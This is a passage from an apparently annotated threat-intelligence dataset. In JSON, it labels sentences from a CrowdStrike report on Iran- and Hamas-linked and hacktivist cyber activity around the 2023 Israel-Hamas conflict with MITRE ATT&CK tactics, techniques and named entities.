"no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s197-2a2462", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 197, "context_before": "MILITANT GROUPS ATTACK ISRAEL > ISRAEL IMPLEMENTS FOUR-HOUR CEASEFIRE IN NORTHERN GAZA >", "sentence_text": "NUMEROUS REGIONAL HACKTIVIST GROUPS CLAIM DDOS ATTACKS ON ISRAELI ENTITIES >", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s198-31e610", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 198, "context_before": "NUMEROUS REGIONAL HACKTIVIST GROUPS CLAIM DDOS ATTACKS ON ISRAELI ENTITIES >", "sentence_text": "HAYWIRE KITTEN-LINKED al-Toufan Team LAUNCHES > Anonymous Sudan AND GHOST JACKAL CLAIM DISRUPTIVE ACTIVITY TARGETING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s199-494b1d", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 199, "context_before": "HAYWIRE KITTEN-LINKED al-Toufan Team LAUNCHES > Anonymous Sudan AND GHOST JACKAL CLAIM DISRUPTIVE ACTIVITY TARGETING", "sentence_text": "ISRAELI HACK-AND-LEAK AND DDOS OPERATIONS AERIAL PROJECTILE WARNING SYSTEMS >", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s200-2b089a", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 200, "context_before": "ISRAELI HACK-AND-LEAK AND DDOS OPERATIONS AERIAL PROJECTILE WARNING SYSTEMS >", "sentence_text": "IRANIAN Rights Seekers GROUP TARGETS CRITICAL ISRAELI INFRASTRUCTURE > PRO-IRGC GROUP Rights Seekers CLAIM ISRAELI MILITARY CRAM NATIONAL WARNING SYSTEM TARGETING >", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1584", "name": "Compromise Infrastructure" } ], "procedure": "Iranian rights seekers group targets Israeli infrastructure", "entities": [ { "text": "IRANIAN Rights Seekers", "start": 0, "end": 22, "label": "ThreatActor" }, { "text": "GROUP TARGETS CRITICAL ISRAELI INFRASTRUCTURE", "start": 23, "end": 68, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s201-26dd99", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 201, "context_before": "IRANIAN Rights Seekers GROUP TARGETS CRITICAL ISRAELI INFRASTRUCTURE > PRO-IRGC GROUP Rights Seekers CLAIM ISRAELI MILITARY CRAM NATIONAL WARNING SYSTEM TARGETING >", "sentence_text": "Cyber Av3ngers TARGETS U.S. ICS > IRGC-AFFILIATED Cyber Av3ngers CLAIMS ATTACKS AGAINST CRITICAL ISRAELI INFRASTRUCTURE >", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": null, "procedure": "Cyber Av3ngers targets US ICS as well as claiming attacks against Israeli infrastructure", "entities": [ { "text": "Cyber Av3ngers", "start": 0, "end": 14, "label": "ThreatActor" }, { "text": "TARGETS U.S. ICS", "start": 15, "end": 31, "label": "Action" }, { "text": "CLAIMS ATTACKS AGAINST CRITICAL ISRAELI INFRASTRUCTURE", "start": 65, "end": 119, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s202-92024e", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 202, "context_before": "Cyber Av3ngers TARGETS U.S. ICS > IRGC-AFFILIATED Cyber Av3ngers CLAIMS ATTACKS AGAINST CRITICAL ISRAELI INFRASTRUCTURE >", "sentence_text": "HEZBOLLAH TARGETS ISRAEL WITH MISSILE ATTACK FROM LEBANON >", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s203-59ac8a", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 203, "context_before": "HEZBOLLAH TARGETS ISRAEL WITH MISSILE ATTACK FROM LEBANON >", "sentence_text": "ANTI-IRANIAN REGIME GROUPS CONDUCT ACTIVITY IN SUPPORT OF ISRAEL > Gonjeshk Darand CONDUCTS DISRUPTIVE CYBER > PRO-IRAQI SHIA MILITIA HACKTIVIST GROUPS CLAIM DISRUPTIONS OF AERIAL PROJECTILE WARNING SYSTEM ATTACK ON IRANIAN GAS STATIONS > GAZA HOSPITAL EXPLOSION OCCURS, SPARKING GLOBAL PROTESTS > IRAN-NEXUS ACTOR DEPLOYS WIPERS AGAINST ISRAELI ORGANIZATIONS > FALSE CLAIMS REGARDING SOCIAL MEDIA SPREAD CONCERNING U.S. AID AND IRAN AND ISRAEL FUNDING > VARIOUS STATE-ALIGNED PROPAGANDA AND PRO-HAMAS MISINFORMATION SPREAD ACROSS SOCIAL AND TRADITIONAL MEDIA >", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s204-b9367d", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 204, "context_before": "ANTI-IRANIAN REGIME GROUPS CONDUCT ACTIVITY IN SUPPORT OF ISRAEL > Gonjeshk Darand CONDUCTS DISRUPTIVE CYBER > PRO-IRAQI SHIA MILITIA HACKTIVIST GROUPS CLAIM DISRUPTIONS OF AERIAL PROJECTILE WARNING SYSTEM ATTACK ON IRANIAN GAS STATIONS > GAZA HOSPITAL EXPLOSION OCCURS, SPARKING GLOBAL PROTESTS > IRAN-NEXUS ACTOR DEPLOYS WIPERS AGAINST ISRAELI ORGANIZATIONS > FALSE CLAIMS REGARDING SOCIAL MEDIA SPREAD CONCERNING U.S. AID AND IRAN AND ISRAEL FUNDING > VARIOUS STATE-ALIGNED PROPAGANDA AND PRO-HAMAS MISINFORMATION SPREAD ACROSS SOCIAL AND TRADITIONAL MEDIA >", "sentence_text": "ISRAEL FORMALLY > PRO-PALESTINIAN HACKTIVISM INCREASINGLY TARGETS ISRAELI HOSPITALS >", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s205-236628", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 205, "context_before": "ISRAEL FORMALLY > PRO-PALESTINIAN HACKTIVISM INCREASINGLY TARGETS ISRAELI HOSPITALS >", "sentence_text": "Yare Gomnam Cyber Team DECLARES WAR > HAYWIRE KITTEN-LINKED Yare", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s206-3e6990", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 206, "context_before": "Yare Gomnam Cyber Team DECLARES WAR > HAYWIRE KITTEN-LINKED Yare", "sentence_text": "Gomnam CYBER TEAM TARGETS CCTVS", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s208-a7d951", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 208, "context_before": "AT U.S.", "sentence_text": "AIRPORTS CLAIMS POWER OUTAGES", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s209-4bf16c", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 209, "context_before": "AIRPORTS CLAIMS POWER OUTAGES", "sentence_text": "IN ISRAEL > IRGC-AFFILIATED SoldiersOfSolomon’s Crucio", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s210-d63148", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 210, "context_before": "IN ISRAEL > IRGC-AFFILIATED SoldiersOfSolomon’s Crucio", "sentence_text": "RANSOMWARE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s211-0a19b7", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 211, "context_before": "RANSOMWARE", "sentence_text": "ATTACKS ISRAELI IT INFRASTRUCTURE > BANISHED KITTEN USES DESTRUCTIVE BiBiWiper AGAINST ISRAELI WINDOWS AND LINUX SYSTEMS > ISRAEL LAUNCHES EXPANDED GROUND OPERATIONS IN GAZA STRIP > VENGEFUL KITTEN-LINKED Moses Staff CLAIMS DATA-WIPING AGAINST ISRAELI ICS > PRO-IRGC Hjmersad PERSONA ANNOUNCES MULTI-NATIONAL HACKTIVIST ALLIANCE >", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1584", "name": "Compromise Infrastructure" }, { "id": "T1499.001", "name": "OS Exhaustion Flood" }, { "id": "T1561", "name": "Disk Wipe" } ], "procedure": "Attacks against Israeli IT infrastructure. Uses destructive BiBiWiper against Israeli windows and Linux systems. Moses Staff claims data-wiping against Israeli ICS", "entities": [ { "text": "ISRAELI IT INFRASTRUCTURE", "start": 8, "end": 33, "label": "Infrastructure_Indicator" }, { "text": "BANISHED KITTEN", "start": 36, "end": 51, "label": "ThreatActor" }, { "text": "BiBiWiper", "start": 69, "end": 78, "label": "MalwareTool" }, { "text": "USES DESTRUCTIVE BiBiWiper AGAINST ISRAELI WINDOWS AND LINUX SYSTEMS", "start": 52, "end": 120, "label": "Action" }, { "text": "CLAIMS DATA-WIPING AGAINST ISRAELI ICS", "start": 217, "end": 255, "label": "Action" }, { "text": "KITTEN-LINKED Moses Staff", "start": 191, "end": 216, "label": "ThreatActor" }, { "text": "WINDOWS AND LINUX SYSTEMS", "start": 95, "end": 120, "label": "Infrastructure_Indicator" }, { "text": "ISRAELI ICS", "start": 244, "end": 255, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s212-ceaeff", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 212, "context_before": "ATTACKS ISRAELI IT INFRASTRUCTURE > BANISHED KITTEN USES DESTRUCTIVE BiBiWiper AGAINST ISRAELI WINDOWS AND LINUX SYSTEMS > ISRAEL LAUNCHES EXPANDED GROUND OPERATIONS IN GAZA STRIP > VENGEFUL KITTEN-LINKED Moses Staff CLAIMS DATA-WIPING AGAINST ISRAELI ICS > PRO-IRGC Hjmersad PERSONA ANNOUNCES MULTI-NATIONAL HACKTIVIST ALLIANCE >", "sentence_text": "HEZBOLLAH CLAIMS ROCKET ATTACKS ON ISRAEL KEY KINETIC/GEOPOLITICALHACKTIVIST EVENTS EVENTS > HACKTIVISTS CONTINUE TO ATTACK ISRAELI RED ALERT MOBILE APPLICATIONS TARGETED INTRUSION EVENTS > HACKTIVIST GROUPS TARGET U.S. AND UK ENTITIES, BROADEN ACTIVITY TO INCLUDE ISRAEL’S ALLIES >", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1499", "name": "Endpoint Denial of Service" } ], "procedure": "Attacks Israeli red alert mobile applications", "entities": [ { "text": "HACKTIVISTS", "start": 93, "end": 104, "label": "ThreatActor" }, { "text": "ISRAELI RED ALERT MOBILE APPLICATIONS", "start": 124, "end": 161, "label": "Infrastructure_Indicator" }, { "text": "ATTACK ISRAELI RED ALERT MOBILE APPLICATIONS", "start": 117, "end": 161, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s213-2fe8f5", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 213, "context_before": "HEZBOLLAH CLAIMS ROCKET ATTACKS ON ISRAEL KEY KINETIC/GEOPOLITICALHACKTIVIST EVENTS EVENTS > HACKTIVISTS CONTINUE TO ATTACK ISRAELI RED ALERT MOBILE APPLICATIONS TARGETED INTRUSION EVENTS > HACKTIVIST GROUPS TARGET U.S. AND UK ENTITIES, BROADEN ACTIVITY TO INCLUDE ISRAEL’S ALLIES >", "sentence_text": "DISTRIBUTED BACKDOOR POSES AS ISRAELI MISSILE-WARNING APP > STATIC KITTEN SPEARPHISHES ISRAELI FINANCIAL AND HEALTHCARE SECTOR ORGANIZATIONS >", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" }, { "id": "T1566", "name": "Phishing" } ], "procedure": "A backdoor masquerades as an Israeli missile-warning application while the threat actor conducts spearphishing campaigns targeting financial and healthcare organizations.", "entities": [ { "text": "DISTRIBUTED BACKDOOR", "start": 0, "end": 20, "label": "MalwareTool" }, { "text": "POSES AS ISRAELI MISSILE-WARNING APP", "start": 21, "end": 57, "label": "Action" }, { "text": "STATIC KITTEN", "start": 60, "end": 73, "label": "ThreatActor" }, { "text": "SPEARPHISHES ISRAELI FINANCIAL AND HEALTHCARE SECTOR ORGANIZATIONS", "start": 74, "end": 140, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s214-cc8d77", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 214, "context_before": "DISTRIBUTED BACKDOOR POSES AS ISRAELI MISSILE-WARNING APP > STATIC KITTEN SPEARPHISHES ISRAELI FINANCIAL AND HEALTHCARE SECTOR ORGANIZATIONS >", "sentence_text": "Cyber Av3ngers CLAIMS ISRAELI POWER DISRUPTIONS", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s215-427aad", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 215, "context_before": "Cyber Av3ngers CLAIMS ISRAELI POWER DISRUPTIONS", "sentence_text": "Cyber Toufan CONDUCTS HACK-AND-LEAK OPERATIONS AGAINST ISRAELI AND ISRAEL-LINKED ORGANIZATIONS INTERNET CONNECTIVITY DROPS ACROSS THE GAZA STRIP AND AREAS OF ISRAEL 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 1 2 3 4 5 6 7 8 9 10 11 19 20 21 22 23 24 30 1 8 9 18 19 20 21 22 23 24 25 26 27 28 29 30 31 OCTOBER NOVEMBER DECEMBER Faketivists associated with Iranian state-nexus adversaries and hacktivists branding themselves as “pro-Palestinian” focused on targeting critical infrastructure, Israeli aerial projectile warning systems and activity intended for information operation purposes in 2023.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1567", "name": "Exfiltration Over Web Service" } ], "procedure": "The threat actor Cyber Toufan conducts hack-and-leak operations against Israeli and affiliated organizations to obtain and expose sensitive information.", "entities": [ { "text": "Cyber Toufan", "start": 0, "end": 12, "label": "ThreatActor" }, { "text": "CONDUCTS HACK-AND-LEAK OPERATIONS", "start": 13, "end": 46, "label": "Action" }, { "text": "CONDUCTS HACK-AND-LEAK OPERATIONS AGAINST ISRAELI AND ISRAEL-LINKED ORGANIZATIONS", "start": 13, "end": 94, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s216-b6c45a", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 216, "context_before": "Cyber Toufan CONDUCTS HACK-AND-LEAK OPERATIONS AGAINST ISRAELI AND ISRAEL-LINKED ORGANIZATIONS INTERNET CONNECTIVITY DROPS ACROSS THE GAZA STRIP AND AREAS OF ISRAEL 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 1 2 3 4 5 6 7 8 9 10 11 19 20 21 22 23 24 30 1 8 9 18 19 20 21 22 23 24 25 26 27 28 29 30 31 OCTOBER NOVEMBER DECEMBER Faketivists associated with Iranian state-nexus adversaries and hacktivists branding themselves as “pro-Palestinian” focused on targeting critical infrastructure, Israeli aerial projectile warning systems and activity intended for information operation purposes in 2023.", "sentence_text": "Though CrowdStrike CAO tracks multiple adversaries associated with the Hamas militant group, activity attributed to these adversaries has not been observed in connection with the Israel-Hamas conflict to date.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s217-70f6a4", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 217, "context_before": "Though CrowdStrike CAO tracks multiple adversaries associated with the Hamas militant group, activity attributed to these adversaries has not been observed in connection with the Israel-Hamas conflict to date.", "sentence_text": "This is likely due to unavailable resources or the degradation of internet and electricity-distribution infrastructure in the conflict zone.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s218-7eb893", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 218, "context_before": "This is likely due to unavailable resources or the degradation of internet and electricity-distribution infrastructure in the conflict zone.", "sentence_text": "Faketivism\nINTRODUCED IN THE CROWDSTRIKE 2016 GLOBAL THREAT REPORT, FAKETIVISM REFERS TO ACTIVITY BY ENTITIES THAT CHARACTERIZE THEMSELVES AS HACKTIVIST GROUPS", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s219-c112f6", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 219, "context_before": "Faketivism\nINTRODUCED IN THE CROWDSTRIKE 2016 GLOBAL THREAT REPORT, FAKETIVISM REFERS TO ACTIVITY BY ENTITIES THAT CHARACTERIZE THEMSELVES AS HACKTIVIST GROUPS", "sentence_text": "BUT MORE LIKELY REPRESENT A FRONT FOR A GOVERNMENT OR OTHERWISE PROFESSIONAL ENTITY.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s220-a38e26", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 220, "context_before": "BUT MORE LIKELY REPRESENT A FRONT FOR A GOVERNMENT OR OTHERWISE PROFESSIONAL ENTITY.", "sentence_text": "IN AN EFFORT TO APPEAR GENUINE, FAKETIVISTS — AKA INAUTHENTIC PERSONAS — OFTEN ADOPT THE EXISTING IMAGERY, RHETORIC, TTPS AND SOMETIMES NAMES OF ESTABLISHED HACKTIVISTS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s221-b26839", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 221, "context_before": "IN AN EFFORT TO APPEAR GENUINE, FAKETIVISTS — AKA INAUTHENTIC PERSONAS — OFTEN ADOPT THE EXISTING IMAGERY, RHETORIC, TTPS AND SOMETIMES NAMES OF ESTABLISHED HACKTIVISTS.", "sentence_text": "THEY OFTEN SURFACE IN DIRECT RESPONSE TO GEOPOLITICAL EVENTS, OFTEN HAVE LITTLE OR NO ESTABLISHED ACTIVITY HISTORY, AND ALMOST ALWAYS OPERATE IN DIRECT ALIGNMENT WITH STATE GOVERNMENT INTERESTS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s222-64701b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 222, "context_before": "THEY OFTEN SURFACE IN DIRECT RESPONSE TO GEOPOLITICAL EVENTS, OFTEN HAVE LITTLE OR NO ESTABLISHED ACTIVITY HISTORY, AND ALMOST ALWAYS OPERATE IN DIRECT ALIGNMENT WITH STATE GOVERNMENT INTERESTS.", "sentence_text": "THESE PERSONAS PROVIDE STATE BACKERS WITH A LAYER OF DENIABILITY", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s223-e8bc13", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 223, "context_before": "THESE PERSONAS PROVIDE STATE BACKERS WITH A LAYER OF DENIABILITY", "sentence_text": "BUT CAN ALSO SERVE INFORMATION OPERATIONS GOALS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p27-s224-bf2e02", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 27, "sentence_id": 224, "context_before": "BUT CAN ALSO SERVE INFORMATION OPERATIONS GOALS.", "sentence_text": "Hamas-Nexus Adversaries\nNoticeably Absent from Conflict-Related Activity and RENEGADE JACKAL demonstrate support for strategic Hamas interests.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p27-s225-63fef8", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 27, "sentence_id": 225, "context_before": "Hamas-Nexus Adversaries\nNoticeably Absent from Conflict-Related Activity and RENEGADE JACKAL demonstrate support for strategic Hamas interests.", "sentence_text": "Additionally, evidence suggests the CruelAlchemy activity cluster represents a Hamas-linked cyber operations unit physically present in Turkey.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p27-s226-d2cae4", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 27, "sentence_id": 226, "context_before": "Additionally, evidence suggests the CruelAlchemy activity cluster represents a Hamas-linked cyber operations unit physically present in Turkey.", "sentence_text": "RENEGADE JACKAL was the most active Hamas-nexus adversary throughout 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p27-s227-7d1319", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 27, "sentence_id": 227, "context_before": "RENEGADE JACKAL was the most active Hamas-nexus adversary throughout 2023.", "sentence_text": "The group primarily targeted Middle East-based government entities with its custom Micropsia Windows malware and Android implants.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1106", "name": "Native API" } ], "procedure": "Attacked Windows and Android OS systems with malware", "entities": [ { "text": "Micropsia Windows malware", "start": 83, "end": 108, "label": "MalwareTool" }, { "text": "targeted", "start": 20, "end": 28, "label": "Action" }, { "text": "Android implants", "start": 113, "end": 129, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p27-s228-0b90cd", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 27, "sentence_id": 228, "context_before": "The group primarily targeted Middle East-based government entities with its custom Micropsia Windows malware and Android implants.", "sentence_text": "In mid-October 2023, ostensible hacktivist group Hamas officials previously indicated was in support of the IDQB Cyberwarfare Unit.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p27-s229-96b371", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 27, "sentence_id": 229, "context_before": "In mid-October 2023, ostensible hacktivist group Hamas officials previously indicated was in support of the IDQB Cyberwarfare Unit.", "sentence_text": "However, CrowdStrike CAO has no further evidence to suggest the aforementioned adversaries are currently targeting Israeli entities in connection with recent events in Israel and Gaza.3", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p27-s230-5c1c21", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 27, "sentence_id": 230, "context_before": "However, CrowdStrike CAO has no further evidence to suggest the aforementioned adversaries are currently targeting Israeli entities in connection with recent events in Israel and Gaza.3", "sentence_text": "Power and internet disruptions have likely hindered Gaza-based adversary operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p27-s231-a023d1", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 27, "sentence_id": 231, "context_before": "Power and internet disruptions have likely hindered Gaza-based adversary operations.", "sentence_text": "Though no CruelAlchemy activity has been observed in direct association with the Israel-Hamas conflict, identified command-and-control (C2) infrastructure indicates the actor remained active following the onset of the conflict, possibly supporting prior reporting that suggests CruelAlchemy operates from outside of Gaza.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p27-s232-9badb7", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 27, "sentence_id": 232, "context_before": "Though no CruelAlchemy activity has been observed in direct association with the Israel-Hamas conflict, identified command-and-control (C2) infrastructure indicates the actor remained active following the onset of the conflict, possibly supporting prior reporting that suggests CruelAlchemy operates from outside of Gaza.", "sentence_text": "Widespread Hacktivist Operations Span Motivational Spectrum, Demonstrate Concerted Interest in Critical Systems", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p27-s233-d2f1cf", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 27, "sentence_id": 233, "context_before": "Widespread Hacktivist Operations Span Motivational Spectrum, Demonstrate Concerted Interest in Critical Systems", "sentence_text": "Known and previously unobserved hacktivists within the conflict region and from around the world claimed the activity, a significant portion of which revolved around attempted or alleged aerial projectile warning system and critical infrastructure disruption targeting Israel.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": null, "procedure": "Claim activity involving attempted or alleged disruption of aerial projectile warning systems and critical infrastructure targeting Israel.", "entities": [ { "text": "hacktivists", "start": 32, "end": 43, "label": "ThreatActor" }, { "text": "claimed the activity", "start": 97, "end": 117, "label": "Action" }, { "text": "attempted or alleged aerial projectile warning system and critical infrastructure disruption", "start": 166, "end": 258, "label": "Action" }, { "text": "aerial projectile warning system", "start": 187, "end": 219, "label": "Infrastructure_Indicator" }, { "text": "critical infrastructure", "start": 224, "end": 247, "label": "Infrastructure_Indicator" }, { "text": "targeting Israel", "start": 259, "end": 275, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p27-s234-a145e2", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 27, "sentence_id": 234, "context_before": "Known and previously unobserved hacktivists within the conflict region and from around the world claimed the activity, a significant portion of which revolved around attempted or alleged aerial projectile warning system and critical infrastructure disruption targeting Israel.", "sentence_text": "A smaller number of hacktivists also extended their operations beyond the conflict region to target countries or entities deemed supportive of Israel.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p27-s235-31efb5", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 27, "sentence_id": 235, "context_before": "A smaller number of hacktivists also extended their operations beyond the conflict region to target countries or entities deemed supportive of Israel.", "sentence_text": "3 https://www.timesofisrael.com/liveblog_entry/idf-exposes-catfishing-network-seeking-to-extract-\ninfo-from-troops-on-hamass-behalf/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p28-s236-4f2e9a", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 28, "sentence_id": 236, "context_before": "3 https://www.timesofisrael.com/liveblog_entry/idf-exposes-catfishing-network-seeking-to-extract-\ninfo-from-troops-on-hamass-behalf/", "sentence_text": "Aerial Projectile Warning Systems and Critical Infrastructure Targeting Multiple hacktivist entities have targeted aerial projectile warning systems in Israel and claimed to have disrupted IDF counter-rocket, artillery and mortar systems to prevent notification delivery and/or send false imminent attack notifications to Israeli citizens.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1565", "name": "Data Manipulation" }, { "id": "T1499", "name": "Endpoint Denial of Service" } ], "procedure": "Hacktivist entities target aerial warning systems and disrupt defense systems to block alerts and send false attack notifications to civilians.", "entities": [ { "text": "hacktivist entities", "start": 81, "end": 100, "label": "ThreatActor" }, { "text": "have targeted aerial projectile warning systems in Israel", "start": 101, "end": 158, "label": "Action" }, { "text": "have disrupted IDF counter-rocket, artillery and mortar systems", "start": 174, "end": 237, "label": "Action" }, { "text": "prevent notification delivery", "start": 241, "end": 270, "label": "Action" }, { "text": "send false imminent attack notifications to Israeli citizens", "start": 278, "end": 338, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p28-s237-60bafe", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 28, "sentence_id": 237, "context_before": "Aerial Projectile Warning Systems and Critical Infrastructure Targeting Multiple hacktivist entities have targeted aerial projectile warning systems in Israel and claimed to have disrupted IDF counter-rocket, artillery and mortar systems to prevent notification delivery and/or send false imminent attack notifications to Israeli citizens.", "sentence_text": "Observed targeting of these services decreased after mid-October 2023; however, a surge of kinetic activity in the region could ignite a renewed interest in further disruption or false notifications.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p28-s238-90384d", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 28, "sentence_id": 238, "context_before": "Observed targeting of these services decreased after mid-October 2023; however, a surge of kinetic activity in the region could ignite a renewed interest in further disruption or false notifications.", "sentence_text": "This activity is likely an attempt to inflict physical and psychological damage on Israeli citizens and will likely continue throughout the duration 